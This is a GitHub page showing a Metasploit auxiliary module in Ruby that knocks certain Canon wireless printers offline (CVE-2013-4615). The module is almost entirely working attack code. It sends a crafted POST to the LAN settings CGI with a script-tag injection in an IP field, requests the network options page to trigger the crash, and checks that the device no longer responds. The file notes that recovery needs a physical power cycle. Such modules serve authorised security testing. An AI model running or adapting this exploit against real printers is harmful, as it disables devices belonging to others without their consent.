Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
metasploit-framework/modules/auxiliary/dos/http/canon_wireless_printer.rb /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
89 lines (78 sloc)
2.57 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: https://metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| class MetasploitModule < Msf::Auxiliary | |
| include Msf::Exploit::Remote::HttpClient | |
| include Msf::Auxiliary::Dos | |
| def initialize(info = {}) | |
| super(update_info(info, | |
| 'Name' => 'Canon Wireless Printer Denial Of Service', | |
| 'Description' => %q{ | |
| The HTTP management interface on several models of Canon Wireless printers | |
| allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note: | |
| if this module is successful, the device can only be recovered with a physical | |
| power cycle. | |
| }, | |
| 'License' => MSF_LICENSE, | |
| 'Author' => | |
| [ | |
| 'Matt "hostess" Andreko <mandreko[at]accuvant.com>' | |
| ], | |
| 'References' => [ | |
| [ 'CVE', '2013-4615' ], | |
| [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html'] | |
| ], | |
| 'DisclosureDate' => '2013-06-18')) | |
| end | |
| def is_alive? | |
| res = send_request_raw({ | |
| 'method' => 'GET', | |
| 'uri' => '/', | |
| },10) | |
| return !res.nil? | |
| end | |
| def run | |
| begin | |
| # The first request will set the new IP | |
| res = send_request_cgi({ | |
| 'method' => 'POST', | |
| 'uri' => '/English/pages_MacUS/cgi_lan.cgi', | |
| 'data' => 'OK.x=61' + | |
| '&OK.y=12' + | |
| '&LAN_OPT1=2' + | |
| '&LAN_TXT1=Wireless' + | |
| '&LAN_OPT3=1' + | |
| '&LAN_TXT21=192' + | |
| '&LAN_TXT22=168' + | |
| '&LAN_TXT23=1' + | |
| '&LAN_TXT24=114"><script>alert(\'xss\');</script>' + | |
| '&LAN_TXT31=255' + | |
| '&LAN_TXT32=255' + | |
| '&LAN_TXT33=255' + | |
| '&LAN_TXT34=0' + | |
| '&LAN_TXT41=192' + | |
| '&LAN_TXT42=168' + | |
| '&LAN_TXT43=1' + | |
| '&LAN_TXT44=1' + | |
| '&LAN_OPT2=4' + | |
| '&LAN_OPT4=1' + | |
| '&LAN_HID1=1' | |
| }) | |
| rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE | |
| print_error("Couldn't connect to #{rhost}:#{rport}") | |
| return | |
| end | |
| # The second request will load the network options page, which seems to trigger the DoS | |
| send_request_cgi({ | |
| 'method' => 'GET', | |
| 'uri' => '/English/pages_MacUS/lan_set_content.html' | |
| },5) #default timeout, we don't care about the response | |
| # Check to see if it worked or not | |
| if is_alive? | |
| print_error("#{rhost}:#{rport} - Server is still alive") | |
| else | |
| print_good("#{rhost}:#{rport} - Connection Refused: Success!") | |
| end | |
| end | |
| end |